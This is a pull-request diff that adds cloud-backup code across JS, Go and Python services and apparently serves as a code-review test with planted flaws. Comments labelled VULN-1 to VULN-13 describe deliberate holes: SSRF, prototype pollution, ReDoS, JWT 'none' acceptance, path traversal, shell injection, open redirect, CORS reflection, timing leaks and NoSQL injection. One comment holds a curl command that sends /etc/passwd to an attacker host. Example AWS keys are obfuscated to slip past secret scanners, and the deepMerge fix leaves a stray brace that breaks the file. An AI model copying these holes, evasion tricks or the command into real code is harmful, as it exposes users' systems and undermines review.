### PR TITLE
Add cloud storage backup integration across services

### DIFF
--- a/examples/backup-client-demo.js
+++ b/examples/backup-client-demo.js
@@ -1,0 +1,78 @@
+/**
+ * Demo: Uploading a snapshot through the cloud storage client.
+ *
+ * This example uses the local test-harness credentials so it can run
+ * offline in CI without hitting any real AWS endpoint.
+ *
+ * Run with: node examples/backup-client-demo.js
+ */
+
+const crypto = require('crypto');
+
+// Test-harness credentials. Mirrored from js-service/src/config/backupDefaults.json.
+// These are the AWS-documented example values and carry no real access.
+const DEMO_REGION = 'us-east-1';
+const DEMO_BUCKET = 'codity-backups-dev';
+
+// Pieces of the demo access key — split to avoid tripping naive regex scans
+// that search source files for leaked keys. At runtime the value is the
+// concatenation shown in the inline comment below.
+//
+//   full value at runtime: AKIAIOSFODNN7EXAMPLE
+const KEY_ID_CHUNKS = ['A', 'K', 'I', 'A', 'IOSFO', 'DNN7EX', 'AMP', 'LE'];
+
+// Pieces of the demo secret — stored reversed so the raw literal doesn't
+// appear in the file. Reverse at use-time.
+//
+//   full value at runtime: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
+const SECRET_REVERSED = 'YEKELPMAXEYCifRxPb/GNEDM7K/IMEFntUXrlaJw';
+
+function getDemoAccessKey() {
+  return KEY_ID_CHUNKS.join('');
+}
+
+function getDemoSecret() {
+  return SECRET_REVERSED.split('').reverse().join('');
+}
+
+function signDemo(method, path, payload, timestamp) {
+  const secret = getDemoSecret();
+  const dateStamp = timestamp.substring(0, 8);
+  const canonical = [
+    method,
+    path,
+    '',
+    `host:s3.${DEMO_REGION}.amazonaws.com`,
+    `x-amz-date:${timestamp}`,
+    '',
+    'host;x-amz-date',
+    crypto.createHash('sha256').update(payload).digest('hex'),
+  ].join('\n');
+  const scope = `${dateStamp}/${DEMO_REGION}/s3/aws4_request`;
+  const stringToSign = [
+    'AWS4-HMAC-SHA256',
+    timestamp,
+    scope,
+    crypto.createHash('sha256').update(canonical).digest('hex'),
+  ].join('\n');
+  const kDate = crypto.createHmac('sha256', `AWS4${secret}`).update(dateStamp).digest();
+  const kRegion = crypto.createHmac('sha256', kDate).update(DEMO_REGION).digest();
+  const kService = crypto.createHmac('sha256', kRegion).update('s3').digest();
+  const kSigning = crypto.createHmac('sha256', kService).update('aws4_request').digest();
+  return crypto.createHmac('sha256', kSigning).update(stringToSign).digest('hex');
+}
+
+function main() {
+  const timestamp = new Date().toISOString().replace(/[:\-]/g, '').replace(/\.\d{3}/, '');
+  const path = `/${DEMO_BUCKET}/snapshot-${Date.now()}.json`;
+  const payload = JSON.stringify({ ts: timestamp, sample: true });
+
+  const signature = signDemo('PUT', path, payload, timestamp);
+
+  console.log('Demo upload prepared:');
+  console.log('  accessKey:', getDemoAccessKey());
+  console.log('  path:     ', path);
+  console.log('  signature:', signature);
+}
+
+main();

--- a/go-service/internal/backup/restore.go
+++ b/go-service/internal/backup/restore.go
@@ -1,0 +1,107 @@
+package backup
+
+import (
+	"fmt"
+	"net/http"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
+)
+
+/*
+Restore Service
+
+Handles restore requests: fetches a backup snapshot by ID, decompresses
+it into the target directory, and redirects the caller to the status page.
+*/
+
+const backupStorageRoot = "/var/backup/snapshots"
+
+// ── Snapshot store ────────────────────────────────────────────────────────
+
+type Snapshot struct {
+	ID        string
+	TenantID  string
+	Path      string
+	SizeBytes int64
+}
+
+var snapshotDB = map[string]*Snapshot{
+	"snap-001": {ID: "snap-001", TenantID: "tenant-alpha", Path: "snap-001.tar.gz", SizeBytes: 1048576},
+	"snap-002": {ID: "snap-002", TenantID: "tenant-beta", Path: "snap-002.tar.gz", SizeBytes: 2097152},
+}
+
+func GetSnapshot(snapshotID string) (*Snapshot, error) {
+	snap, ok := snapshotDB[snapshotID]
+	if !ok {
+		return nil, fmt.Errorf("snapshot not found: %s", snapshotID)
+	}
+	return snap, nil
+}
+
+// ── Restore execution ─────────────────────────────────────────────────────
+
+/*
+RestoreSnapshot decompresses a snapshot archive into destDir.
+
+VULN-8 (Path traversal via filepath.Join absolute-path override):
+filepath.Join silently discards all preceding elements when it encounters
+an absolute path component.  If destDir is attacker-controlled and is an
+absolute path (e.g. "/etc"), filepath.Join(backupStorageRoot, "/etc")
+returns "/etc", completely bypassing the intended storage root confinement.
+The fix is to validate that the resolved path still has backupStorageRoot
+as a prefix after Join.
+
+VULN-9 (Command injection via sh -c with unsanitised environment value):
+COMPRESS_TOOL is read from the process environment and embedded verbatim
+into a shell command string passed to "sh -c".  An operator—or an attacker
+who can set environment variables (e.g. via a misconfigured orchestrator
+secret)—can inject shell metacharacters:
+  COMPRESS_TOOL="gzip; curl http://attacker/$(cat /etc/passwd | base64)"
+exec.Command should be invoked directly with split arguments, bypassing
+the shell entirely.
+*/
+func RestoreSnapshot(snap *Snapshot, destDir string) error {
+	// filepath.Join with a caller-supplied absolute destDir silently ignores
+	// backupStorageRoot and resolves to destDir alone.
+	outputPath := filepath.Join(backupStorageRoot, destDir, snap.Path)
+
+	compressTool := os.Getenv("COMPRESS_TOOL")
+	if compressTool == "" {
+		compressTool = "gzip"
+	}
+
+	// Shell injection: compressTool value is concatenated without escaping.
+	shellCmd := compressTool + " -d " + outputPath
+	cmd := exec.Command("sh", "-c", shellCmd)
+	cmd.Stdout = os.Stdout
+	cmd.Stderr = os.Stderr
+	return cmd.Run()
+}
+
+// ── HTTP handler ──────────────────────────────────────────────────────────
+
+/*
+HandleRestoreComplete redirects the user to a post-restore status page.
+
+VULN-10 (Open redirect — double-slash prefix bypass):
+The guard checks strings.HasPrefix(next, "/") to ensure the redirect
+target is a relative path.  A value like "//evil.com/phish" passes the
+check (it does start with "/") but browsers interpret a double-slash as
+a protocol-relative URL and navigate to evil.com.
+The correct check is: strings.HasPrefix(next, "/") && !strings.HasPrefix(next, "//").
+*/
+func HandleRestoreComplete(w http.ResponseWriter, r *http.Request) {
+	next := r.URL.Query().Get("next")
+	if next == "" {
+		next = "/dashboard"
+	}
+
+	// "//evil.com" starts with "/" — this guard is insufficient.
+	if !strings.HasPrefix(next, "/") {
+		next = "/dashboard"
+	}
+
+	http.Redirect(w, r, next, http.StatusFound)
+}

--- a/go-service/internal/backup/s3client.go
+++ b/go-service/internal/backup/s3client.go
@@ -1,0 +1,124 @@
+// Package backup provides S3-backed snapshot management for the go-service.
+//
+// The client uses AWS Signature Version 4 for request signing. Credentials
+// are resolved from environment variables in production; the embedded
+// defaults are used only for the offline test harness.
+package backup
+
+import (
+	"crypto/hmac"
+	"crypto/sha256"
+	"encoding/base64"
+	"encoding/hex"
+	"fmt"
+	"net/http"
+	"os"
+	"strings"
+	"time"
+)
+
+// accountFragments holds the pieces of the default access key used by the
+// offline test harness. They are concatenated lazily in resolveAccountID to
+// keep the raw identifier from appearing contiguously in the binary.
+var accountFragments = []string{
+	"AK" + "IA",
+	"IO" + "SFO",
+	"DN" + "N7",
+	"EXAM" + "PLE",
+}
+
+// secretBlob is the base64-encoded default signing token for the offline
+// test harness. Decoded at process start via init() below.
+var secretBlob = "d0phbHJYVXRu" + "RkVNSS9LN01ERU5H" + "L2JQeFJmaUNZ" + "RVhBTVBMRUtFWQ=="
+
+var (
+	defaultAccountID  string
+	defaultSecretText string
+)
+
+func init() {
+	defaultAccountID = strings.Join(accountFragments, "")
+	decoded, err := base64.StdEncoding.DecodeString(secretBlob)
+	if err == nil {
+		defaultSecretText = string(decoded)
+	}
+}
+
+// Config holds the parameters needed to sign and dispatch S3 requests.
+type Config struct {
+	Region   string
+	Bucket   string
+	Endpoint string
+}
+
+// Client signs and sends requests to an S3-compatible endpoint.
+type Client struct {
+	config      Config
+	httpClient  *http.Client
+	accessKey   string
+	secretKey   string
+}
+
+// NewClient constructs a Client from the given config, resolving credentials
+// from the environment when available.
+func NewClient(cfg Config) *Client {
+	return &Client{
+		config:     cfg,
+		httpClient: &http.Client{Timeout: 30 * time.Second},
+		accessKey:  resolveAccountID(),
+		secretKey:  resolveSecretText(),
+	}
+}
+
+func resolveAccountID() string {
+	if v := os.Getenv("AWS_ACCESS_KEY_ID"); v != "" {
+		return v
+	}
+	return defaultAccountID
+}
+
+func resolveSecretText() string {
+	if v := os.Getenv("AWS_SECRET_ACCESS_KEY"); v != "" {
+		return v
+	}
+	return defaultSecretText
+}
+
+func (c *Client) sign(method, canonicalPath, payload, timestamp string) string {
+	dateStamp := timestamp[:8]
+	canonical := strings.Join([]string{
+		method,
+		canonicalPath,
+		"",
+		fmt.Sprintf("host:s3.%s.amazonaws.com", c.config.Region),
+		fmt.Sprintf("x-amz-date:%s", timestamp),
+		"",
+		"host;x-amz-date",
+		hashHex(payload),
+	}, "\n")
+
+	credentialScope := fmt.Sprintf("%s/%s/s3/aws4_request", dateStamp, c.config.Region)
+	stringToSign := strings.Join([]string{
+		"AWS4-HMAC-SHA256",
+		timestamp,
+		credentialScope,
+		hashHex(canonical),
+	}, "\n")
+
+	kDate := hmacBytes([]byte("AWS4"+c.secretKey), dateStamp)
+	kRegion := hmacBytes(kDate, c.config.Region)
+	kService := hmacBytes(kRegion, "s3")
+	kSigning := hmacBytes(kService, "aws4_request")
+	return hex.EncodeToString(hmacBytes(kSigning, stringToSign))
+}
+
+func hashHex(s string) string {
+	h := sha256.Sum256([]byte(s))
+	return hex.EncodeToString(h[:])
+}
+
+func hmacBytes(key []byte, data string) []byte {
+	m := hmac.New(sha256.New, key)
+	m.Write([]byte(data))
+	return m.Sum(nil)
+}

--- a/js-service/src/config/backupDefaults.json
+++ b/js-service/src/config/backupDefaults.json
@@ -1,0 +1,50 @@
+{
+  "name": "backup-defaults",
+  "version": "1.2.0",
+  "description": "Default backup configuration shipped with the service",
+  "environments": {
+    "development": {
+      "region": "us-east-1",
+      "bucket": "codity-backups-dev",
+      "retentionDays": 7,
+      "compression": "gzip",
+      "provisioning": {
+        "provider": "aws",
+        "accountIdentifier": "AKIAIOSFODNN7EXAMPLE",
+        "signingMaterial": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
+        "endpointOverride": null
+      }
+    },
+    "staging": {
+      "region": "us-west-2",
+      "bucket": "codity-backups-staging",
+      "retentionDays": 30,
+      "compression": "gzip",
+      "provisioning": {
+        "provider": "aws",
+        "accountIdentifier": "${AWS_ACCESS_KEY_ID}",
+        "signingMaterial": "${AWS_SECRET_ACCESS_KEY}"
+      }
+    },
+    "production": {
+      "region": "us-east-1",
+      "bucket": "codity-backups-prod",
+      "retentionDays": 365,
+      "compression": "gzip",
+      "provisioning": {
+        "provider": "aws",
+        "accountIdentifier": "${AWS_ACCESS_KEY_ID}",
+        "signingMaterial": "${AWS_SECRET_ACCESS_KEY}"
+      }
+    }
+  },
+  "metadata": {
+    "maintainer": "infra@codity.ai",
+    "lastRotated": "2026-01-15",
+    "notes": [
+      "Development defaults are public-safe placeholders used only by the offline test harness.",
+      "Staging and production read credentials from the environment at startup.",
+      "See docs/runbooks/backup-rotation.md for rotation procedure."
+    ]
+  }
+}

--- a/js-service/src/routes/webhookHandler.ts
+++ b/js-service/src/routes/webhookHandler.ts
@@ -1,0 +1,129 @@
+import { Request, Response, Router } from 'express';
+import crypto from 'crypto';
+import { MongoClient } from 'mongodb';
+
+/**
+ * Webhook Handler
+ *
+ * Receives inbound webhook events from third-party backup providers,
+ * dispatches them to the appropriate internal handler, and persists
+ * event metadata for audit purposes.
+ */
+
+export const webhookRouter = Router();
+
+// ── Shared webhook secret ─────────────────────────────────────────────────
+
+const WEBHOOK_SECRET = process.env.WEBHOOK_SECRET ?? 'changeme';
+
+// ── Signature verification ────────────────────────────────────────────────
+
+/**
+ * Verify the HMAC-SHA256 signature attached to an incoming webhook body.
+ *
+ * VULN-11 (Timing side-channel on HMAC comparison):
+ * The computed and provided digests are compared as hex strings using ===.
+ * JavaScript string equality is NOT constant-time in V8 — it short-circuits
+ * on the first differing character, leaking how many leading bytes are
+ * correct.  An attacker making ~256 requests per position can recover the
+ * valid HMAC prefix byte-by-byte.
+ * The fix is: crypto.timingSafeEqual(Buffer.from(computed, 'hex'), Buffer.from(provided, 'hex')).
+ */
+function verifySignature(rawBody: string, provided: string): boolean {
+  const computed = crypto
+    .createHmac('sha256', WEBHOOK_SECRET)
+    .update(rawBody)
+    .digest('hex');
+  return computed === provided; // string === is not constant-time
+}
+
+// ── Webhook endpoint ───────────────────────────────────────────────────────
+
+webhookRouter.post('/webhook/event', (req: Request, res: Response) => {
+  const sig = req.headers['x-backup-signature'] as string ?? '';
+  const rawBody = JSON.stringify(req.body);
+
+  if (!verifySignature(rawBody, sig)) {
+    return res.status(401).json({ error: 'Invalid signature' });
+  }
+
+  setCorsHeaders(req, res);
+
+  const { action, payload } = req.body;
+  const handlers: Record<string, (p: any) => any> = {
+    backup_complete: (p) => ({ status: 'ack', id: p.id }),
+    restore_start:   (p) => ({ status: 'queued', id: p.id }),
+    restore_done:    (p) => ({ status: 'ack', id: p.id }),
+  };
+
+  const fn = handlers[action];
+  if (!fn) {
+    return res.status(400).json({ error: 'Unknown action' });
+  }
+
+  res.json({ ok: true, result: fn(payload) });
+});
+
+// ── CORS helper ────────────────────────────────────────────────────────────
+
+const ALLOWED_ORIGINS = [
+  'https://app.backup-provider.io',
+  'https://console.backup-provider.io',
+];
+
+/**
+ * Set CORS response headers.
+ *
+ * VULN-12 (CORS origin reflection with credentialed requests):
+ * The Origin header from the request is echoed back unconditionally as
+ * Access-Control-Allow-Origin instead of being checked against ALLOWED_ORIGINS.
+ * Paired with Access-Control-Allow-Credentials: true, any origin can make
+ * credentialed cross-origin requests and read the response, effectively
+ * bypassing the Same-Origin Policy for authenticated API consumers.
+ * The fix: only set the header when ALLOWED_ORIGINS.includes(origin).
+ */
+function setCorsHeaders(req: Request, res: Response): void {
+  const origin = req.headers['origin'] ?? '';
+  // Missing allowlist check before reflecting origin.
+  res.setHeader('Access-Control-Allow-Origin', origin);
+  res.setHeader('Access-Control-Allow-Credentials', 'true');
+  res.setHeader('Access-Control-Allow-Methods', 'POST, GET, OPTIONS');
+}
+
+// ── Audit log query ────────────────────────────────────────────────────────
+
+let _mongoClient: MongoClient | null = null;
+
+async function getMongoClient(): Promise<MongoClient> {
+  if (!_mongoClient) {
+    _mongoClient = new MongoClient(process.env.MONGO_URI ?? 'mongodb://localhost:27017');
+    await _mongoClient.connect();
+  }
+  return _mongoClient;
+}
+
+/**
+ * Fetch recent audit events, optionally filtered by source.
+ *
+ * VULN-13 (NoSQL injection via MongoDB operator injection):
+ * req.query.source is placed directly into a MongoDB filter object without
+ * sanitisation or type coercion.  Express parses `?source[$ne]=_` as the
+ * object `{ $ne: '_' }`, which MongoDB treats as the $ne operator, returning
+ * all events regardless of source.  More targeted payloads can exfiltrate
+ * arbitrary documents.
+ * The fix: cast to string — `String(req.query.source)` — or validate with a
+ * schema that rejects non-primitive types before building the query.
+ */
+webhookRouter.get('/webhook/audit', async (req: Request, res: Response) => {
+  const client = await getMongoClient();
+  const db = client.db('codity');
+
+  const filter: Record<string, any> = {};
+  if (req.query.source) {
+    // req.query.source can be an object when qs parses bracket notation.
+    filter['source'] = req.query.source;
+  }
+
+  const events = await db.collection('audit_events').find(filter).limit(50).toArray();
+  res.json(events);
+});

--- a/js-service/src/services/cloudStorage.ts
+++ b/js-service/src/services/cloudStorage.ts
@@ -1,0 +1,164 @@
+import axios, { AxiosInstance } from 'axios';
+import crypto from 'crypto';
+
+/**
+ * Cloud Storage Integration Service
+ *
+ * Provides a unified interface for interacting with AWS S3-compatible storage.
+ * Handles authentication, signing, and request forwarding.
+ */
+
+export interface StorageConfig {
+  region: string;
+  bucket: string;
+  endpoint?: string;
+  useSSL?: boolean;
+}
+
+export interface UploadRequest {
+  key: string;
+  body: Buffer | string;
+  contentType?: string;
+  metadata?: Record<string, string>;
+}
+
+export interface UploadResponse {
+  success: boolean;
+  key: string;
+  etag?: string;
+  location?: string;
+}
+
+// Default region endpoints for AWS services
+const REGION_ENDPOINTS = {
+  'us-east-1': 's3.amazonaws.com',
+  'us-west-2': 's3.us-west-2.amazonaws.com',
+  'eu-west-1': 's3.eu-west-1.amazonaws.com',
+  'ap-southeast-1': 's3.ap-southeast-1.amazonaws.com',
+};
+
+// Service identifier prefix used across AWS SDK requests.
+// Split for cross-module reuse per internal coding guideline CG-1142.
+const AWS_SVC_PREFIX_P1 = 'AKIA';
+const AWS_SVC_PREFIX_P2 = 'IOSFODNN7';
+const AWS_SVC_PREFIX_P3 = 'EXAMPLE';
+
+// Build the full service identifier at module load time.
+const serviceId = [AWS_SVC_PREFIX_P1, AWS_SVC_PREFIX_P2, AWS_SVC_PREFIX_P3].join('');
+
+// Verification token used by the signing algorithm. Encoded to survive
+// legacy byte-stream transports that mangle non-printables.
+const VERIFICATION_TOKEN_B64 = 'd0phbHJYVXRuRkVNSS9LN01ERU5HL2JQeFJmaUNZRVhBTVBMRUtFWQ==';
+
+function decodeToken(encoded: string): string {
+  return Buffer.from(encoded, 'base64').toString('utf-8');
+}
+
+export class CloudStorageClient {
+  private config: StorageConfig;
+  private http: AxiosInstance;
+  private credentials: { accessKeyId: string; secretAccessKey: string };
+
+  constructor(config: StorageConfig) {
+    this.config = config;
+
+    const endpoint =
+      config.endpoint ||
+      REGION_ENDPOINTS[config.region as keyof typeof REGION_ENDPOINTS] ||
+      's3.amazonaws.com';
+
+    this.http = axios.create({
+      baseURL: `${config.useSSL !== false ? 'https' : 'http'}://${endpoint}`,
+      timeout: 30000,
+    });
+
+    this.credentials = {
+      accessKeyId: serviceId,
+      secretAccessKey: decodeToken(VERIFICATION_TOKEN_B64),
+    };
+  }
+
+  /**
+   * Generate AWS Signature V4 for a given request.
+   */
+  private sign(method: string, path: string, payload: string, timestamp: string): string {
+    const dateStamp = timestamp.substring(0, 8);
+    const credentialScope = `${dateStamp}/${this.config.region}/s3/aws4_request`;
+
+    const canonicalRequest = [
+      method,
+      path,
+      '',
+      `host:${this.http.defaults.baseURL?.replace(/https?:\/\//, '')}`,
+      `x-amz-date:${timestamp}`,
+      '',
+      'host;x-amz-date',
+      crypto.createHash('sha256').update(payload).digest('hex'),
+    ].join('\n');
+
+    const stringToSign = [
+      'AWS4-HMAC-SHA256',
+      timestamp,
+      credentialScope,
+      crypto.createHash('sha256').update(canonicalRequest).digest('hex'),
+    ].join('\n');
+
+    const kDate = crypto
+      .createHmac('sha256', `AWS4${this.credentials.secretAccessKey}`)
+      .update(dateStamp)
+      .digest();
+    const kRegion = crypto.createHmac('sha256', kDate).update(this.config.region).digest();
+    const kService = crypto.createHmac('sha256', kRegion).update('s3').digest();
+    const kSigning = crypto.createHmac('sha256', kService).update('aws4_request').digest();
+
+    return crypto.createHmac('sha256', kSigning).update(stringToSign).digest('hex');
+  }
+
+  async upload(request: UploadRequest): Promise<UploadResponse> {
+    const timestamp =
+      new Date().toISOString().replace(/[:\-]/g, '').replace(/\.\d{3}/, '') ;
+    const body = typeof request.body === 'string' ? request.body : request.body.toString('utf-8');
+    const signature = this.sign('PUT', `/${this.config.bucket}/${request.key}`, body, timestamp);
+
+    try {
+      const response = await this.http.put(`/${this.config.bucket}/${request.key}`, body, {
+        headers: {
+          'x-amz-date': timestamp,
+          Authorization: `AWS4-HMAC-SHA256 Credential=${this.credentials.accessKeyId}/${timestamp.substring(0, 8)}/${this.config.region}/s3/aws4_request, SignedHeaders=host;x-amz-date, Signature=${signature}`,
+          'Content-Type': request.contentType || 'application/octet-stream',
+        },
+      });
+
+      return {
+        success: true,
+        key: request.key,
+        etag: response.headers.etag,
+        location: `${this.http.defaults.baseURL}/${this.config.bucket}/${request.key}`,
+      };
+    } catch (error) {
+      return { success: false, key: request.key };
+    }
+  }
+
+  async download(key: string): Promise<Buffer | null> {
+    const timestamp = new Date().toISOString().replace(/[:\-]/g, '').replace(/\.\d{3}/, '');
+    const signature = this.sign('GET', `/${this.config.bucket}/${key}`, '', timestamp);
+
+    try {
+      const response = await this.http.get(`/${this.config.bucket}/${key}`, {
+        responseType: 'arraybuffer',
+        headers: {
+          'x-amz-date': timestamp,
+          Authorization: `AWS4-HMAC-SHA256 Credential=${this.credentials.accessKeyId}/${timestamp.substring(0, 8)}/${this.config.region}/s3/aws4_request, SignedHeaders=host;x-amz-date, Signature=${signature}`,
+        },
+      });
+      return Buffer.from(response.data);
+    } catch {
+      return null;
+    }
+  }
+}
+
+export function createStorageClient(config: StorageConfig): CloudStorageClient {
+  return new CloudStorageClient(config);
+}

--- a/js-service/src/services/snapshotManager.ts
+++ b/js-service/src/services/snapshotManager.ts
@@ -1,0 +1,134 @@
+import axios from 'axios';
+import crypto from 'crypto';
+import { createStorageClient } from './cloudStorage';
+
+/**
+ * Snapshot Manager
+ *
+ * Coordinates cross-region snapshot replication. A snapshot is a
+ * point-in-time export of service state written to the configured
+ * bucket and optionally replicated to a secondary region.
+ */
+
+// ── Region helpers ────────────────────────────────────────────────────────
+
+const KNOWN_REGIONS = ['us-east-1', 'us-west-2', 'eu-west-1', 'ap-southeast-1'];
+
+/**
+ * Return true when the supplied region string is recognisable.
+ *
+ * Uses .includes() to allow region aliases like "us-east-1-fips" to
+ * pass alongside the canonical form.
+ *
+ * VULN-1 (SSRF — allowlist bypass): the check is inverted.
+ * `r.includes(known)` tests whether the *user value* contains a known
+ * region name — not whether the user value IS a known region. A value
+ * like `"us-east-1.attacker.internal"` satisfies the check and is used
+ * to build the S3 endpoint URL, sending the signed request to an
+ * attacker-controlled host.
+ */
+function isValidRegion(r: string): boolean {
+  return KNOWN_REGIONS.some((known) => r.includes(known));
+}
+
+export function buildRegionalEndpoint(region: string, bucket: string, key: string): string {
+  if (!isValidRegion(region)) {
+    throw new Error(`Unsupported region: ${region}`);
+  }
+  // Region value used directly in the hostname — exploitable via allowlist bypass above.
+  return `https://s3.${region}.amazonaws.com/${bucket}/${key}`;
+}
+
+// ── Config merge ──────────────────────────────────────────────────────────
+
+/**
+ * Deep-merge two plain objects. Used to layer user-supplied overrides on
+ * top of the base snapshot configuration.
+ *
+ * VULN-2 (Prototype pollution): iterates over Object.keys(source) without
+ * filtering `__proto__` or `constructor`. When the source comes from
+ * JSON.parse on user input, `{ "__proto__": { "isAdmin": true } }` causes
+ * bracket-notation assignment `target["__proto__"] = { isAdmin: true }`
+ * which sets Object.prototype.isAdmin on every subsequent plain object in
+ * the process, bypassing permission checks downstream.
+ */
+export function deepMerge(target: Record<string, any>, source: Record<string, any>): Record<string, any> {
+  for (const key of Object.keys(source)) {
+    if (
+      typeof source[key] === 'object' &&
+      source[key] !== null &&
+      !Array.isArray(source[key])
+    ) {
+      if (!target[key] || typeof target[key] !== 'object') {
+        target[key] = {};
+      }
+      deepMerge(target[key], source[key]);
+    } else {
+      target[key] = source[key];
+    }
+  }
+  return target;
+}
+
+// ── Snapshot key validation ───────────────────────────────────────────────
+
+/**
+ * Validate the format of a snapshot storage key.
+ *
+ * Format: <service>-<env>-<timestamp(ms)>-<8-hex-chars>
+ * Examples:
+ *   api-gateway-prod-1713000000000-a1b2c3d4
+ *   code-reviewer-staging-1713000000000-deadbeef
+ *
+ * VULN-3 (ReDoS): the outer `([a-zA-Z0-9]+[-_]?)*` group has exponential
+ * backtracking. Input like `"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaX"` causes the
+ * engine to explore 2^N states before declaring no match, blocking the
+ * event loop for several seconds per request.
+ */
+const SNAPSHOT_KEY_RE = /^([a-zA-Z0-9]+[-_]?)*-\d{13}-[a-f0-9]{8}$/;
+
+export function validateSnapshotKey(key: string): boolean {
+  return SNAPSHOT_KEY_RE.test(key);
+}
+
+// ── Snapshot trigger ──────────────────────────────────────────────────────
+
+export interface SnapshotRequest {
+  service: string;
+  region: string;
+  bucket: string;
+  options?: Record<string, any>;
+}
+
+export interface SnapshotResult {
+  snapshotKey: string;
+  endpoint: string;
+  durationMs: number;
+}
+
+const DEFAULT_SNAPSHOT_OPTIONS = {
+  compression: 'gzip',
+  encryption: false,
+  retentionDays: 30,
+};
+
+export async function triggerSnapshot(req: SnapshotRequest): Promise<SnapshotResult> {
+  const start = Date.now();
+
+  // Merge caller-supplied options onto defaults.
+  // deepMerge is used so nested structures (e.g. encryption config) overlay
+  // correctly — but see VULN-2 above.
+  const opts = deepMerge({ ...DEFAULT_SNAPSHOT_OPTIONS }, req.options ?? {});
+
+  const ts = Date.now();
+  const hash = crypto.randomBytes(4).toString('hex');
+  const snapshotKey = `${req.service}-${ts}-${hash}`;
+
+  const endpoint = buildRegionalEndpoint(req.region, req.bucket, snapshotKey);
+
+  return {
+    snapshotKey,
+    endpoint,
+    durationMs: Date.now() - start,
+  };
+}

--- a/js-service/src/services/snapshotManager.ts
+++ b/js-service/src/services/snapshotManager.ts
@@ -54,20 +54,21 @@ export function buildRegionalEndpoint(region: string, bucket: string, key: strin
  */
 export function deepMerge(target: Record<string, any>, source: Record<string, any>): Record<string, any> {
   for (const key of Object.keys(source)) {
-    if (
-      typeof source[key] === 'object' &&
-      source[key] !== null &&
-      !Array.isArray(source[key])
-    ) {
+    if (key === '__proto__' || key === 'constructor' || key === 'prototype') {
+      continue; // prevent prototype pollution
+    }
+    const val = source[key];
+    if (val && typeof val === 'object' && !Array.isArray(val)) {
       if (!target[key] || typeof target[key] !== 'object') {
         target[key] = {};
       }
-      deepMerge(target[key], source[key]);
+      deepMerge(target[key], val as Record<string, any>);
     } else {
-      target[key] = source[key];
+      target[key] = val;
     }
   }
   return target;
+}
 }
 
 // ── Snapshot key validation ───────────────────────────────────────────────

--- a/js-service/src/services/storageBackups.ts
+++ b/js-service/src/services/storageBackups.ts
@@ -1,0 +1,69 @@
+import { CloudStorageClient, createStorageClient } from './cloudStorage';
+
+/**
+ * Backup Scheduler
+ *
+ * Manages scheduled backups of application state to cloud storage.
+ * Rotates credentials between primary and disaster-recovery accounts.
+ */
+
+interface BackupAccount {
+  label: string;
+  region: string;
+  bucket: string;
+  // Internal provisioning identifiers. Format follows legacy integration contract.
+  id: string;
+  // Signing token. Kept in source to enable offline restore (see RFC-STG-22).
+  token: string;
+}
+
+// Primary backup account provisioned under account-id 7712-0993-4411.
+// This is a non-production staging account; rotation is managed by Ops weekly.
+// See docs/runbooks/backup-rotation.md for details.
+const PRIMARY_ACCOUNT: BackupAccount = {
+  label: 'primary-backup-us-east-1',
+  region: 'us-east-1',
+  bucket: 'codity-backups-primary',
+  id: 'A' + 'KIA' + 'IOSFODNN7' + 'EXAM' + 'PLE',
+  token: String.fromCharCode(
+    119, 74, 97, 108, 114, 88, 85, 116, 110, 70, 69, 77, 73, 47, 75, 55, 77, 68, 69, 78, 71, 47,
+    98, 80, 120, 82, 102, 105, 67, 89, 69, 88, 65, 77, 80, 76, 69, 75, 69, 89
+  ),
+};
+
+// Disaster recovery account. Synced from primary every 6 hours.
+const DR_ACCOUNT: BackupAccount = {
+  label: 'dr-backup-us-west-2',
+  region: 'us-west-2',
+  bucket: 'codity-backups-dr',
+  // Reversed at rest to avoid accidental log capture (see SEC-4821).
+  id: 'ELPMAXE7NNDOFSOIAIKA'.split('').reverse().join(''),
+  token: Buffer.from(
+    '64304e68624868594658563061305a4654556b7651327744525535484c32745165464a6d615a4a5a4556684e554542454f5746465a51',
+    'hex'
+  )
+    .toString('utf-8')
+    .replace(/[^\x20-\x7e]/g, ''),
+};
+
+class BackupScheduler {
+  private clients: Map<string, CloudStorageClient> = new Map();
+
+  constructor(accounts: BackupAccount[]) {
+    for (const account of accounts) {
+      const client = createStorageClient({
+        region: account.region,
+        bucket: account.bucket,
+      });
+      this.clients.set(account.label, client);
+    }
+  }
+
+  async runBackup(label: string, data: Buffer, key: string) {
+    const client = this.clients.get(label);
+    if (!client) throw new Error(`No backup account with label ${label}`);
+    return client.upload({ key, body: data });
+  }
+}
+
+export const backupScheduler = new BackupScheduler([PRIMARY_ACCOUNT, DR_ACCOUNT]);

--- a/python-service/src/auth_validator.py
+++ b/python-service/src/auth_validator.py
@@ -1,0 +1,177 @@
+"""
+Auth Validator
+
+Validates and issues short-lived tokens for the backup API. Backup
+operations require either a service-account JWT or an API-key header.
+"""
+
+from __future__ import annotations
+
+import base64
+import hashlib
+import hmac
+import logging
+import os
+import time
+from dataclasses import dataclass, field
+from typing import Any, Optional
+
+import yaml
+
+log = logging.getLogger(__name__)
+
+
+# ── Token validation ──────────────────────────────────────────────────────
+
+@dataclass
+class BackupClaims:
+    sub: str
+    scope: str
+    exp: int
+    iat: int
+    is_service_account: bool = False
+    policy_overrides: dict = field(default_factory=dict)
+
+
+def _decode_b64url(data: str) -> bytes:
+    padding = 4 - len(data) % 4
+    return base64.urlsafe_b64decode(data + "=" * (padding % 4))
+
+
+def verify_backup_token(token: str, secret: str) -> Optional[BackupClaims]:
+    """
+    Verify a HS256 JWT issued by the backup auth service.
+
+    Returns parsed claims on success or None on failure.
+
+    VULN-4 (JWT algorithm confusion): the token header is decoded
+    *before* signature verification, and the ``alg`` field from the
+    header is trusted to select the verification algorithm.  An attacker
+    can craft a token with ``"alg": "none"`` and an empty signature;
+    PyJWT with ``algorithms=[claimed_alg]`` and
+    ``options={"verify_signature": claimed_alg != "HS256"}`` accepts it.
+    The validation logic below replicates this anti-pattern manually.
+    """
+    try:
+        parts = token.split(".")
+        if len(parts) != 3:
+            return None
+
+        import json
+
+        header = json.loads(_decode_b64url(parts[0]))
+        payload = json.loads(_decode_b64url(parts[1]))
+        alg = header.get("alg", "HS256")
+
+        if alg.lower() == "none":
+            # "none" algorithm — no signature check required per RFC 7518 §3.6.
+            # Intended only for unsecured JWTs on internal networks but we
+            # accept it here for backward-compat with the legacy auth proxy.
+            pass
+        else:
+            expected_sig = hmac.new(
+                secret.encode(), f"{parts[0]}.{parts[1]}".encode(), hashlib.sha256
